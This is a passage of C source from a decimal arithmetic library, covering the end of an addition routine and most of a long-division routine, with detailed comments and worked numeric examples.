*/ } } /* non-0 res */ #if DECSUBSET } /* extended */ #endif decFinish(res, set, &residue, status); /* clean and finalize */ break;} if (ISZERO(rhs)) { /* [lhs is non-zero] */ Int adjust; /* work */ Int rexp=rhs->exponent; /* save in case RHS==RES */ bits=rhs->bits; /* be clean */ residue=0; /* clear accumulator */ decCopyFit(res, lhs, set, &residue, status); /* copy (as needed) */ #if DECSUBSET if (set->extended) { /* exponents on zeros count */ #endif /* exponent will be the lower of the two */ /* [0-0 case handled above] */ adjust=rexp-res->exponent; /* adjustment needed [if -ve] */ if (adjust<0) { /* 0-padding needed */ if ((res->digits-adjust)>set->digits) { adjust=res->digits-set->digits; /* to fit exactly */ *status|=DEC_Rounded; /* [but exact] */ } res->digits=decShiftToMost(res->lsu, res->digits, -adjust); res->exponent+=adjust; /* set the exponent. */ } #if DECSUBSET } /* extended */ #endif decFinish(res, set, &residue, status); /* clean and finalize */ break;} /* [NB: both fastpath and mainpath code below assume these cases */ /* (notably 0-0) have already been handled] */ /* calculate the padding needed to align the operands */ padding=rhs->exponent-lhs->exponent; /* Fastpath cases where the numbers are aligned and normal, the RHS */ /* is all in one unit, no operand rounding is needed, and no carry, */ /* lengthening, or borrow is needed */ if (padding==0 && rhs->digits<=DECDPUN && rhs->exponent>=set->emin /* [some normals drop through] */ && rhs->exponent<=set->emax-set->digits+1 /* [could clamp] */ && rhs->digits<=reqdigits && lhs->digits<=reqdigits) { Int partial=*lhs->lsu; if (!diffsign) { /* adding */ partial+=*rhs->lsu; if ((partial<=DECDPUNMAX) /* result fits in unit */ && (lhs->digits>=DECDPUN || /* .. and no digits-count change */ partial<(Int)powers[lhs->digits])) { /* .. */ if (res!=lhs) decNumberCopy(res, lhs); /* not in place */ *res->lsu=(Unit)partial; /* [copy could have overwritten RHS] */ break; } /* else drop out for careful add */ } else { /* signs differ */ partial-=*rhs->lsu; if (partial>0) { /* no borrow needed, and non-0 result */ if (res!=lhs) decNumberCopy(res, lhs); /* not in place */ *res->lsu=(Unit)partial; /* this could have reduced digits [but result>0] */ res->digits=decGetDigits(res->lsu, D2U(res->digits)); break; } /* else drop out for careful subtract */ } } /* Now align (pad) the lhs or rhs so they can be added or */ /* subtracted, as necessary. If one number is much larger than */ /* the other (that is, if in plain form there is at least one */ /* digit between the lowest digit of one and the highest of the */ /* other) padding with up to DIGITS-1 trailing zeros may be */ /* needed; then apply rounding (as exotic rounding modes may be */ /* affected by the residue). */ rhsshift=0; /* rhs shift to left (padding) in Units */ bits=lhs->bits; /* assume sign is that of LHS */ mult=1; /* likely multiplier */ /* [if padding==0 the operands are aligned; no padding is needed] */ if (padding!=0) { /* some padding needed; always pad the RHS, as any required */ /* padding can then be effected by a simple combination of */ /* shifts and a multiply */ Flag swapped=0; if (padding<0) { /* LHS needs the padding */ const decNumber *t; padding=-padding; /* will be +ve */ bits=(uByte)(rhs->bits^negate); /* assumed sign is now that of RHS */ t=lhs; lhs=rhs; rhs=t; swapped=1; } /* If, after pad, rhs would be longer than lhs by digits+1 or */ /* more then lhs cannot affect the answer, except as a residue, */ /* so only need to pad up to a length of DIGITS+1. 
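For example (editor's illustration): with digits=9, 1E+100 plus
1E-100 swaps so that rhs=1E+100; then 1+200 > 1+9+1, so the result
is just 1E+100 with the tiny operand reduced to a rounding residue.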
*/ if (rhs->digits+padding > lhs->digits+reqdigits+1) { /* The RHS is sufficient */ /* for residue use the relative sign indication... */ Int shift=reqdigits-rhs->digits; /* left shift needed */ residue=1; /* residue for rounding */ if (diffsign) residue=-residue; /* signs differ */ /* copy, shortening if necessary */ decCopyFit(res, rhs, set, &residue, status); /* if it was already shorter, then need to pad with zeros */ if (shift>0) { res->digits=decShiftToMost(res->lsu, res->digits, shift); res->exponent-=shift; /* adjust the exponent. */ } /* flip the result sign if unswapped and rhs was negated */ if (!swapped) res->bits^=negate; decFinish(res, set, &residue, status); /* done */ break;} /* LHS digits may affect result */ rhsshift=D2U(padding+1)-1; /* this much by Unit shift .. */ mult=powers[padding-(rhsshift*DECDPUN)]; /* .. this by multiplication */ } /* padding needed */ if (diffsign) mult=-mult; /* signs differ */ /* determine the longer operand */ maxdigits=rhs->digits+padding; /* virtual length of RHS */ if (lhs->digits>maxdigits) maxdigits=lhs->digits; /* Decide on the result buffer to use; if possible place directly */ /* into result. */ acc=res->lsu; /* assume add direct to result */ /* If destructive overlap, or the number is too long, or a carry or */ /* borrow to DIGITS+1 might be possible, a buffer must be used. */ /* [Might be worth more sophisticated tests when maxdigits==reqdigits] */ if ((maxdigits>=reqdigits) /* is, or could be, too large */ || (res==rhs && rhsshift>0)) { /* destructive overlap */ /* buffer needed, choose it; units for maxdigits digits will be */ /* needed, +1 Unit for carry or borrow */ Int need=D2U(maxdigits)+1; acc=accbuff; /* assume use local buffer */ if (need*sizeof(Unit)>sizeof(accbuff)) { /* printf("malloc add %ld %ld\n", need, sizeof(accbuff)); */ allocacc=(Unit *)malloc(need*sizeof(Unit)); if (allocacc==NULL) { /* hopeless -- abandon */ *status|=DEC_Insufficient_storage; break;} acc=allocacc; } } res->bits=(uByte)(bits&DECNEG); /* it's now safe to overwrite.. */ res->exponent=lhs->exponent; /* .. operands (even if aliased) */ #if DECTRACE decDumpAr('A', lhs->lsu, D2U(lhs->digits)); decDumpAr('B', rhs->lsu, D2U(rhs->digits)); printf(" :h: %ld %ld\n", rhsshift, mult); #endif /* add [A+B*m] or subtract [A+B*(-m)] */ res->digits=decUnitAddSub(lhs->lsu, D2U(lhs->digits), rhs->lsu, D2U(rhs->digits), rhsshift, acc, mult) *DECDPUN; /* [units -> digits] */ if (res->digits<0) { /* borrowed... */ res->digits=-res->digits; res->bits^=DECNEG; /* flip the sign */ } #if DECTRACE decDumpAr('+', acc, D2U(res->digits)); #endif /* If a buffer was used the result must be copied back, possibly */ /* shortening. (If no buffer was used then the result must have */ /* fit, so can't need rounding and residue must be 0.) */ residue=0; /* clear accumulator */ if (acc!=res->lsu) { #if DECSUBSET if (set->extended) { /* round from first significant digit */ #endif /* remove leading zeros that were added due to rounding up to */ /* integral Units -- before the test for rounding. */ if (res->digits>reqdigits) res->digits=decGetDigits(acc, D2U(res->digits)); decSetCoeff(res, set, acc, res->digits, &residue, status); #if DECSUBSET } else { /* subset arithmetic rounds from original significant digit */ /* May have an underestimate. This only occurs when both */ /* numbers fit in DECDPUN digits and are padding with a */ /* negative multiple (-10, -100...) and the top digit(s) become */ /* 0. 
(This only matters when using X3.274 rules where the */ /* leading zero could be included in the rounding.) */ if (res->digits<maxdigits) { *(acc+D2U(res->digits))=0; /* ensure leading 0 is there */ res->digits=maxdigits; } else { /* remove leading zeros that were added due to rounding up to */ /* integral Units (but only those in excess of the original */ /* maxdigits length, unless extended) before test for rounding. */ if (res->digits>reqdigits) { res->digits=decGetDigits(acc, D2U(res->digits)); if (res->digits<maxdigits) res->digits=maxdigits; } } decSetCoeff(res, set, acc, res->digits, &residue, status); /* Now apply rounding if needed before removing leading zeros. */ /* This is safe because subnormals are not a possibility */ if (residue!=0) { decApplyRound(res, set, residue, status); residue=0; /* did what needed to be done */ } } /* subset */ #endif } /* used buffer */ /* strip leading zeros [these were left on in case of subset subtract] */ res->digits=decGetDigits(res->lsu, D2U(res->digits)); /* apply checks and rounding */ decFinish(res, set, &residue, status); /* "When the sum of two operands with opposite signs is exactly */ /* zero, the sign of that sum shall be '+' in all rounding modes */ /* except round toward -Infinity, in which mode that sign shall be */ /* '-'." [Subset zeros also never have '-', set by decFinish.] */ if (ISZERO(res) && diffsign #if DECSUBSET && set->extended #endif && (*status&DEC_Inexact)==0) { if (set->round==DEC_ROUND_FLOOR) res->bits|=DECNEG; /* sign - */ else res->bits&=~DECNEG; /* sign + */ } } while(0); /* end protected */ if (allocacc!=NULL) free(allocacc); /* drop any storage used */ #if DECSUBSET if (allocrhs!=NULL) free(allocrhs); /* .. */ if (alloclhs!=NULL) free(alloclhs); /* .. */ #endif return res; } /* decAddOp */ /* ------------------------------------------------------------------ */ /* decDivideOp -- division operation */ /* */ /* This routine performs the calculations for all four division */ /* operators (divide, divideInteger, remainder, remainderNear). */ /* */ /* C=A op B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X/X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* op is DIVIDE, DIVIDEINT, REMAINDER, or REMNEAR respectively. */ /* status is the usual accumulator */ /* */ /* C must have space for set->digits digits. */ /* */ /* ------------------------------------------------------------------ */ /* The underlying algorithm of this routine is the same as in the */ /* 1981 S/370 implementation, that is, non-restoring long division */ /* with bi-unit (rather than bi-digit) estimation for each unit */ /* multiplier. In this pseudocode overview, complications for the */ /* Remainder operators and division residues for exact rounding are */ /* omitted for clarity. 
*/ /* */ /* Prepare operands and handle special values */ /* Test for x/0 and then 0/x */ /* Exp =Exp1 - Exp2 */ /* Exp =Exp +len(var1) -len(var2) */ /* Sign=Sign1 * Sign2 */ /* Pad accumulator (Var1) to double-length with 0's (pad1) */ /* Pad Var2 to same length as Var1 */ /* msu2pair/plus=1st 2 or 1 units of var2, +1 to allow for round */ /* have=0 */ /* Do until (have=digits+1 OR residue=0) */ /* if exp<0 then if integer divide/residue then leave */ /* this_unit=0 */ /* Do forever */ /* compare numbers */ /* if <0 then leave inner_loop */ /* if =0 then (* quick exit without subtract *) do */ /* this_unit=this_unit+1; output this_unit */ /* leave outer_loop; end */ /* Compare lengths of numbers (mantissae): */ /* If same then tops2=msu2pair -- {units 1&2 of var2} */ /* else tops2=msu2plus -- {0, unit 1 of var2} */ /* tops1=first_unit_of_Var1*10**DECDPUN +second_unit_of_var1 */ /* mult=tops1/tops2 -- Good and safe guess at divisor */ /* if mult=0 then mult=1 */ /* this_unit=this_unit+mult */ /* subtract */ /* end inner_loop */ /* if have\=0 | this_unit\=0 then do */ /* output this_unit */ /* have=have+1; end */ /* var2=var2/10 */ /* exp=exp-1 */ /* end outer_loop */ /* exp=exp+1 -- set the proper exponent */ /* if have=0 then generate answer=0 */ /* Return (Result is defined by Var1) */ /* */ /* ------------------------------------------------------------------ */ /* Two working buffers are needed during the division; one (digits+ */ /* 1) to accumulate the result, and the other (up to 2*digits+1) for */ /* long subtractions. These are acc and var1 respectively. */ /* var1 is a copy of the lhs coefficient, var2 is the rhs coefficient.*/ /* The static buffers may be larger than might be expected to allow */ /* for calls from higher-level functions (notably exp). */ /* ------------------------------------------------------------------ */ static decNumber * decDivideOp(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set, Flag op, uInt *status) { #if DECSUBSET decNumber *alloclhs=NULL; /* non-NULL if rounded lhs allocated */ decNumber *allocrhs=NULL; /* .., rhs */ #endif Unit accbuff[SD2U(DECBUFFER+DECDPUN+10)]; /* local buffer */ Unit *acc=accbuff; /* -> accumulator array for result */ Unit *allocacc=NULL; /* -> allocated buffer, iff allocated */ Unit *accnext; /* -> where next digit will go */ Int acclength; /* length of acc needed [Units] */ Int accunits; /* count of units accumulated */ Int accdigits; /* count of digits accumulated */ Unit varbuff[SD2U(DECBUFFER*2+DECDPUN)*sizeof(Unit)]; /* buffer for var1 */ Unit *var1=varbuff; /* -> var1 array for long subtraction */ Unit *varalloc=NULL; /* -> allocated buffer, iff used */ Unit *msu1; /* -> msu of var1 */ const Unit *var2; /* -> var2 array */ const Unit *msu2; /* -> msu of var2 */ Int msu2plus; /* msu2 plus one [does not vary] */ eInt msu2pair; /* msu2 pair plus one [does not vary] */ Int var1units, var2units; /* actual lengths */ Int var2ulen; /* logical length (units) */ Int var1initpad=0; /* var1 initial padding (digits) */ Int maxdigits; /* longest LHS or required acc length */ Int mult; /* multiplier for subtraction */ Unit thisunit; /* current unit being accumulated */ Int residue; /* for rounding */ Int reqdigits=set->digits; /* requested DIGITS */ Int exponent; /* working exponent */ Int maxexponent=0; /* DIVIDE maximum exponent if unrounded */ uByte bits; /* working sign */ Unit *target; /* work */ const Unit *source; /* .. */ uLong const *pow; /* .. */ Int shift, cut; /* .. 
*/ #if DECSUBSET Int dropped; /* work */ #endif #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif do { /* protect allocated storage */ #if DECSUBSET if (!set->extended) { /* reduce operands and set lostDigits status, as needed */ if (lhs->digits>reqdigits) { alloclhs=decRoundOperand(lhs, set, status); if (alloclhs==NULL) break; lhs=alloclhs; } if (rhs->digits>reqdigits) { allocrhs=decRoundOperand(rhs, set, status); if (allocrhs==NULL) break; rhs=allocrhs; } } #endif /* [following code does not require input rounding] */ bits=(lhs->bits^rhs->bits)&DECNEG; /* assumed sign for divisions */ /* handle infinities and NaNs */ if (SPECIALARGS) { /* a special bit set */ if (SPECIALARGS & (DECSNAN | DECNAN)) { /* one or two NaNs */ decNaNs(res, lhs, rhs, set, status); break; } /* one or two infinities */ if (decNumberIsInfinite(lhs)) { /* LHS (dividend) is infinite */ if (decNumberIsInfinite(rhs) || /* two infinities are invalid .. */ op & (REMAINDER | REMNEAR)) { /* as is remainder of infinity */ *status|=DEC_Invalid_operation; break; } /* [Note that infinity/0 raises no exceptions] */ decNumberZero(res); res->bits=bits|DECINF; /* set +/- infinity */ break; } else { /* RHS (divisor) is infinite */ residue=0; if (op&(REMAINDER|REMNEAR)) { /* result is [finished clone of] lhs */ decCopyFit(res, lhs, set, &residue, status); } else { /* a division */ decNumberZero(res); res->bits=bits; /* set +/- zero */ /* for DIVIDEINT the exponent is always 0. For DIVIDE, result */ /* is a 0 with infinitely negative exponent, clamped to minimum */ if (op&DIVIDE) { res->exponent=set->emin-set->digits+1; *status|=DEC_Clamped; } } decFinish(res, set, &residue, status); break; } } /* handle 0 rhs (x/0) */ if (ISZERO(rhs)) { /* x/0 is always exceptional */ if (ISZERO(lhs)) { decNumberZero(res); /* [after lhs test] */ *status|=DEC_Division_undefined;/* 0/0 will become NaN */ } else { decNumberZero(res); if (op&(REMAINDER|REMNEAR)) *status|=DEC_Invalid_operation; else { *status|=DEC_Division_by_zero; /* x/0 */ res->bits=bits|DECINF; /* .. is +/- Infinity */ } } break;} /* handle 0 lhs (0/x) */ if (ISZERO(lhs)) { /* 0/x [x!=0] */ #if DECSUBSET if (!set->extended) decNumberZero(res); else { #endif if (op&DIVIDE) { residue=0; exponent=lhs->exponent-rhs->exponent; /* ideal exponent */ decNumberCopy(res, lhs); /* [zeros always fit] */ res->bits=bits; /* sign as computed */ res->exponent=exponent; /* exponent, too */ decFinalize(res, set, &residue, status); /* check exponent */ } else if (op&DIVIDEINT) { decNumberZero(res); /* integer 0 */ res->bits=bits; /* sign as computed */ } else { /* a remainder */ exponent=rhs->exponent; /* [save in case overwrite] */ decNumberCopy(res, lhs); /* [zeros always fit] */ if (exponent<res->exponent) res->exponent=exponent; /* use lower */ } #if DECSUBSET } #endif break;} /* Precalculate exponent. This starts off adjusted (and hence fits */ /* in 31 bits) and becomes the usual unadjusted exponent as the */ /* division proceeds. The order of evaluation is important, here, */ /* to avoid wrap. 
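For example (editor's illustration): 875/1000 starts with working
exponent (0+3)-(0+4) = -1, showing before any subtraction is done
that the quotient is below 1.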
*/ exponent=(lhs->exponent+lhs->digits)-(rhs->exponent+rhs->digits); /* If the working exponent is -ve, then some quick exits are */ /* possible because the quotient is known to be <1 */ /* [for REMNEAR, it needs to be < -1, as -0.5 could need work] */ if (exponent<0 && !(op==DIVIDE)) { if (op&DIVIDEINT) { decNumberZero(res); /* integer part is 0 */ #if DECSUBSET if (set->extended) #endif res->bits=bits; /* set +/- zero */ break;} /* fastpath remainders so long as the lhs has the smaller */ /* (or equal) exponent */ if (lhs->exponent<=rhs->exponent) { if (op&REMAINDER || exponent<-1) { /* It is REMAINDER or safe REMNEAR; result is [finished */ /* clone of] lhs (r = x - 0*y) */ residue=0; decCopyFit(res, lhs, set, &residue, status); decFinish(res, set, &residue, status); break; } /* [unsafe REMNEAR drops through] */ } } /* fastpaths */ /* Long (slow) division is needed; roll up the sleeves... */ /* The accumulator will hold the quotient of the division. */ /* If it needs to be too long for stack storage, then allocate. */ acclength=D2U(reqdigits+DECDPUN); /* in Units */ if (acclength*sizeof(Unit)>sizeof(accbuff)) { /* printf("malloc dvacc %ld units\n", acclength); */ allocacc=(Unit *)malloc(acclength*sizeof(Unit)); if (allocacc==NULL) { /* hopeless -- abandon */ *status|=DEC_Insufficient_storage; break;} acc=allocacc; /* use the allocated space */ } /* var1 is the padded LHS ready for subtractions. */ /* If it needs to be too long for stack storage, then allocate. */ /* The maximum units needed for var1 (long subtraction) is: */ /* Enough for */ /* (rhs->digits+reqdigits-1) -- to allow full slide to right */ /* or (lhs->digits) -- to allow for long lhs */ /* whichever is larger */ /* +1 -- for rounding of slide to right */ /* +1 -- for leading 0s */ /* +1 -- for pre-adjust if a remainder or DIVIDEINT */ /* [Note: unused units do not participate in decUnitAddSub data] */ maxdigits=rhs->digits+reqdigits-1; if (lhs->digits>maxdigits) maxdigits=lhs->digits; var1units=D2U(maxdigits)+2; /* allocate a guard unit above msu1 for REMAINDERNEAR */ if (!(op&DIVIDE)) var1units++; if ((var1units+1)*sizeof(Unit)>sizeof(varbuff)) { /* printf("malloc dvvar %ld units\n", var1units+1); */ varalloc=(Unit *)malloc((var1units+1)*sizeof(Unit)); if (varalloc==NULL) { /* hopeless -- abandon */ *status|=DEC_Insufficient_storage; break;} var1=varalloc; /* use the allocated space */ } /* Extend the lhs and rhs to full long subtraction length. The lhs */ /* is truly extended into the var1 buffer, with 0 padding, so a */ /* subtract in place is always possible. The rhs (var2) has */ /* virtual padding (implemented by decUnitAddSub). */ /* One guard unit was allocated above msu1 for rem=rem+rem in */ /* REMAINDERNEAR. */ msu1=var1+var1units-1; /* msu of var1 */ source=lhs->lsu+D2U(lhs->digits)-1; /* msu of input array */ for (target=msu1; source>=lhs->lsu; source--, target--) *target=*source; for (; target>=var1; target--) *target=0; /* rhs (var2) is left-aligned with var1 at the start */ var2ulen=var1units; /* rhs logical length (units) */ var2units=D2U(rhs->digits); /* rhs actual length (units) */ var2=rhs->lsu; /* -> rhs array */ msu2=var2+var2units-1; /* -> msu of var2 [never changes] */ /* now set up the variables which will be used for estimating the */ /* multiplication factor. If these variables are not exact, add */ /* 1 to make sure that the multiplier is never overestimated. */ msu2plus=*msu2; /* its value .. */ if (var2units>1) msu2plus++; /* .. 
+1 if any more */ msu2pair=(eInt)*msu2*(DECDPUNMAX+1);/* top two pair .. */ if (var2units>1) { /* .. [else treat 2nd as 0] */ msu2pair+=*(msu2-1); /* .. */ if (var2units>2) msu2pair++; /* .. +1 if any more */ } /* The calculation is working in units, which may have leading zeros, */ /* but the exponent was calculated on the assumption that they are */ /* both left-aligned. Adjust the exponent to compensate: add the */ /* number of leading zeros in var1 msu and subtract those in var2 msu. */ /* [This is actually done by counting the digits and negating, as */ /* lead1=DECDPUN-digits1, and similarly for lead2.] */ for (pow=&powers[1]; *msu1>=*pow; pow++) exponent--; for (pow=&powers[1]; *msu2>=*pow; pow++) exponent++; /* Now, if doing an integer divide or remainder, ensure that */ /* the result will be Unit-aligned. To do this, shift the var1 */ /* accumulator towards least if need be. (It's much easier to */ /* do this now than to reassemble the residue afterwards, if */ /* doing a remainder.) Also ensure the exponent is not negative. */ if (!(op&DIVIDE)) { Unit *u; /* work */ /* save the initial 'false' padding of var1, in digits */ var1initpad=(var1units-D2U(lhs->digits))*DECDPUN; /* Determine the shift to do. */ if (exponent<0) cut=-exponent; else cut=DECDPUN-exponent%DECDPUN; decShiftToLeast(var1, var1units, cut); exponent+=cut; /* maintain numerical value */ var1initpad-=cut; /* .. and reduce padding */ /* clean any most-significant units which were just emptied */ for (u=msu1; cut>=DECDPUN; cut-=DECDPUN, u--) *u=0; } /* align */ else { /* is DIVIDE */ maxexponent=lhs->exponent-rhs->exponent; /* save */ /* optimization: if the first iteration will just produce 0, */ /* preadjust to skip it [valid for DIVIDE only] */ if (*msu1<*msu2) { var2ulen--; /* shift down */ exponent-=DECDPUN; /* update the exponent */ } } /* ---- start the long-division loops ------------------------------ */ accunits=0; /* no units accumulated yet */ accdigits=0; /* .. or digits */ accnext=acc+acclength-1; /* -> msu of acc [NB: allows digits+1] */ for (;;) { /* outer forever loop */ thisunit=0; /* current unit assumed 0 */ /* find the next unit */ for (;;) { /* inner forever loop */ /* strip leading zero units [from either pre-adjust or from */ /* subtract last time around]. Leave at least one unit. */ for (; *msu1==0 && msu1>var1; msu1--) var1units--; if (var1units<var2ulen) break; /* var1 too low for subtract */ if (var1units==var2ulen) { /* unit-by-unit compare needed */ /* compare the two numbers, from msu */ const Unit *pv1, *pv2; Unit v2; /* units to compare */ pv2=msu2; /* -> msu */ for (pv1=msu1; ; pv1--, pv2--) { /* v1=*pv1 -- always OK */ v2=0; /* assume in padding */ if (pv2>=var2) v2=*pv2; /* in range */ if (*pv1!=v2) break; /* no longer the same */ if (pv1==var1) break; /* done; leave pv1 as is */ } /* here when all inspected or a difference seen */ if (*pv1<v2) break; /* var1 too low to subtract */ if (*pv1==v2) { /* var1 == var2 */ /* reach here if var1 and var2 are identical; subtraction */ /* would increase digit by one, and the residue will be 0 so */ /* the calculation is done; leave the loop with residue=0. */ thisunit++; /* as though subtracted */ *var1=0; /* set var1 to 0 */ var1units=1; /* .. */ break; /* from inner */ } /* var1 == var2 */ /* *pv1>v2. Prepare for real subtraction; the lengths are equal */ /* Estimate the multiplier (there's always a msu1-1)... */ /* Bring in two units of var2 to provide a good estimate. 
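Worked estimate (editor's illustration, DECDPUN=4, var2 exactly
two units): with var1's top units 8765,4321 and var2's 1234,5678,
tops1=87654321 and msu2pair=12345678, so mult=7; because msu2pair
is rounded up whenever it is inexact, mult can only err low, and
any shortfall is made up on the next pass of the inner loop.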
*/ mult=(Int)(((eInt)*msu1*(DECDPUNMAX+1)+*(msu1-1))/msu2pair); } /* lengths the same */ else { /* var1units > var2ulen, so subtraction is safe */ /* The var2 msu is one unit towards the lsu of the var1 msu, */ /* so only one unit for var2 can be used. */ mult=(Int)(((eInt)*msu1*(DECDPUNMAX+1)+*(msu1-1))/msu2plus); } if (mult==0) mult=1; /* must always be at least 1 */ /* subtraction needed; var1 is > var2 */ thisunit=(Unit)(thisunit+mult); /* accumulate */ /* subtract var1-var2, into var1; only the overlap needs */ /* processing, as this is an in-place calculation */ shift=var2ulen-var2units; #if DECTRACE decDumpAr('1', &var1[shift], var1units-shift); decDumpAr('2', var2, var2units); printf("m=%ld\n", -mult); #endif decUnitAddSub(&var1[shift], var1units-shift, var2, var2units, 0, &var1[shift], -mult); #if DECTRACE decDumpAr('#', &var1[shift], var1units-shift); #endif /* var1 now probably has leading zeros; these are removed at the */ /* top of the inner loop. */ } /* inner loop */ /* The next unit has been calculated in full; unless it's a */ /* leading zero, add to acc */ if (accunits!=0 || thisunit!=0) { /* is first or non-zero */ *accnext=thisunit; /* store in accumulator */ /* account exactly for the new digits */ if (accunits==0) { accdigits++; /* at least one */ for (pow=&powers[1]; thisunit>=*pow; pow++) accdigits++; } else accdigits+=DECDPUN; accunits++; /* update count */ accnext--; /* ready for next */ if (accdigits>reqdigits) break; /* have enough digits */ } /* if the residue is zero, the operation is done (unless divide */ /* or divideInteger and still not enough digits yet) */ if (*var1==0 && var1units==1) { /* residue is 0 */ if (op&(REMAINDER|REMNEAR)) break; if ((op&DIVIDE) && (exponent<=maxexponent)) break; /* [drop through if divideInteger] */ } /* also done enough if calculating remainder or integer */ /* divide and just did the last ('units') unit */ if (exponent==0 && !(op&DIVIDE)) break; /* to get here, var1 is less than var2, so divide var2 by the per- */ /* Unit power of ten and go for the next digit */ var2ulen--; /* shift down */ exponent-=DECDPUN; /* update the exponent */ } /* outer loop */ /* ---- division is complete --------------------------------------- */ /* here: acc has at least reqdigits+1 of good results (or fewer */ /* if early stop), starting at accnext+1 (its lsu) */ /* var1 has any residue at the stopping point */ /* accunits is the number of digits collected in acc */ if (accunits==0) { /* acc is 0 */ accunits=1; /* show have a unit .. */ accdigits=1; /* .. */ *accnext=0; /* .. whose value is 0 */ } else accnext++; /* back to last placed */ /* accnext now -> lowest unit of result */ residue=0; /* assume no residue */ if (op&DIVIDE) { /* record the presence of any residue, for rounding */ if (*var1!=0 || var1units>1) residue=1; else { /* no residue */ /* Had an exact division; clean up spurious trailing 0s. */ /* There will be at most DECDPUN-1, from the final multiply, */ /* and then only if the result is non-0 (and even) and the */ /* exponent is 'loose'. 
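For example (editor's illustration, DECDPUN=4): 1/5 can leave the
loop with coefficient 2000 and exponent -4; the division is exact,
so the three trailing zeros are chopped and the exponent raised to
-1, never past maxexponent (here 0).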
*/ #if DECDPUN>1 Unit lsu=*accnext; if (!(lsu&0x01) && (lsu!=0)) { /* count the trailing zeros */ Int drop=0; for (;; drop++) { /* [will terminate because lsu!=0] */ if (exponent>=maxexponent) break; /* don't chop real 0s */ #if DECDPUN<=4 if ((lsu-QUOT10(lsu, drop+1) *powers[drop+1])!=0) break; /* found non-0 digit */ #else if (lsu%powers[drop+1]!=0) break; /* found non-0 digit */ #endif exponent++; } if (drop>0) { accunits=decShiftToLeast(accnext, accunits, drop); accdigits=decGetDigits(accnext, accunits); accunits=D2U(accdigits); /* [exponent was adjusted in the loop] */ } } /* neither odd nor 0 */ #endif } /* exact divide */ } /* divide */ else /* op!=DIVIDE */ { /* check for coefficient overflow */ if (accdigits+exponent>reqdigits) { *status|=DEC_Division_impossible; break; } if (op & (REMAINDER|REMNEAR)) { /* [Here, the exponent will be 0, because var1 was adjusted */ /* appropriately.] */ Int postshift; /* work */ Flag wasodd=0; /* integer was odd */ Unit *quotlsu; /* for save */ Int quotdigits; /* .. */ bits=lhs->bits; /* remainder sign is always as lhs */ /* Fastpath when residue is truly 0 is worthwhile [and */ /* simplifies the code below] */ if (*var1==0 && var1units==1) { /* residue is 0 */ Int exp=lhs->exponent; /* save min(exponents) */ if (rhs->exponent<exp) exp=rhs->exponent; decNumberZero(res); /* 0 coefficient */ #if DECSUBSET if (set->extended) #endif res->exponent=exp; /* .. with proper exponent */ res->bits=(uByte)(bits&DECNEG); /* [cleaned] */ decFinish(res, set, &residue, status); /* might clamp */ break; } /* note if the quotient was odd */ if (*accnext & 0x01) wasodd=1; /* acc is odd */ quotlsu=accnext; /* save in case need to reinspect */ quotdigits=accdigits; /* .. */ /* treat the residue, in var1, as the value to return, via acc */ /* calculate the unused zero digits. This is the smaller of: */ /* var1 initial padding (saved above) */ /* var2 residual padding, which happens to be given by: */ postshift=var1initpad+exponent-lhs->exponent+rhs->exponent; /* [the 'exponent' term accounts for the shifts during divide] */ if (var1initpad<postshift) postshift=var1initpad; /* shift var1 the requested amount, and adjust its digits */ var1units=decShiftToLeast(var1, var1units, postshift); accnext=var1; accdigits=decGetDigits(var1, var1units); accunits=D2U(accdigits); exponent=lhs->exponent; /* exponent is smaller of lhs & rhs */ if (rhs->exponent<exponent) exponent=rhs->exponent; /* Now correct the result if doing remainderNear; if it */ /* (looking just at coefficients) is > rhs/2, or == rhs/2 and */ /* the integer was odd then the result should be rem-rhs. */ if (op&REMNEAR) { Int compare, tarunits; /* work */ Unit *up; /* .. */ /* calculate remainder*2 into the var1 buffer (which has */ /* 'headroom' of an extra unit and hence enough space) */ /* [a dedicated 'double' loop would be faster, here] */ tarunits=decUnitAddSub(accnext, accunits, accnext, accunits, 0, accnext, 1); /* decDumpAr('r', accnext, tarunits); */ /* Here, accnext (var1) holds tarunits Units with twice the */ /* remainder's coefficient, which must now be compared to the */ /* RHS. The remainder's exponent may be smaller than the RHS's. */ compare=decUnitCompare(accnext, tarunits, rhs->lsu, D2U(rhs->digits), rhs->exponent-exponent); if (compare==BADINT) { /* deep trouble */ *status|=DEC_Insufficient_storage; break;} /* now restore the remainder by dividing by two; the lsu */ /* is known to be even. 
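For example (editor's illustration, DECDPUN=4): halving the units
[0000,3] (value 30000), the lsu halves to 0000, then the odd msu
halves to 1 and pushes DIV_ROUND_UP(9999,2)=5000 into the unit
below, leaving [5000,1], which is 15000.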
*/ for (up=accnext; up<accnext+tarunits; up++) { Int half; /* half to add to lower unit */ half=*up & 0x01; *up/=2; /* [shift] */ if (!half) continue; *(up-1)+=DIV_ROUND_UP(DECDPUNMAX, 2); } /* [accunits still describes the original remainder length] */ if (compare>0 || (compare==0 && wasodd)) { /* adjustment needed */ Int exp, expunits, exprem; /* work */ /* This is effectively causing round-up of the quotient, */ /* so if it was the rare case where it was full and all */ /* nines, it would overflow and hence division-impossible */ /* should be raised */ Flag allnines=0; /* 1 if quotient all nines */ if (quotdigits==reqdigits) { /* could be borderline */ for (up=quotlsu; ; up++) { if (quotdigits>DECDPUN) { if (*up!=DECDPUNMAX) break;/* non-nines */ } else { /* this is the last Unit */ if (*up==powers[quotdigits]-1) allnines=1; break; } quotdigits-=DECDPUN; /* checked those digits */ } /* up */ } /* borderline check */ if (allnines) { *status|=DEC_Division_impossible; break;} /* rem-rhs is needed; the sign will invert. Again, var1 */ /* can safely be used for the working Units array. */ exp=rhs->exponent-exponent; /* RHS padding needed */ /* Calculate units and remainder from exponent. */ expunits=exp/DECDPUN; exprem=exp%DECDPUN; /* subtract [A+B*(-m)]; the result will always be negative */ accunits=-decUnitAddSub(accnext, accunits, rhs->lsu, D2U(rhs->digits), expunits, accnext, -(Int)powers[exprem]); accdigits=decGetDigits(accnext, accunits); /* count digits exactly */ accunits=D2U(accdigits); /* and recalculate the units for copy */ /* [exponent is as for original remainder] */ bits^=DECNEG; /* flip the sign */ } } /* REMNEAR */ } /* REMAINDER or REMNEAR */ } /* not DIVIDE */ /* Set exponent and bits */ res->exponent=exponent; res->bits=(uByte)(bits&DECNEG); /* [cleaned] */ /* Now the coefficient. */ decSetCoeff(res, set, accnext, accdigits, &residue, status); decFinish(res, set, &residue, status); /* final cleanup */ #if DECSUBSET /* If a divide then strip trailing zeros if subset [after round] */ if (!set->extended && 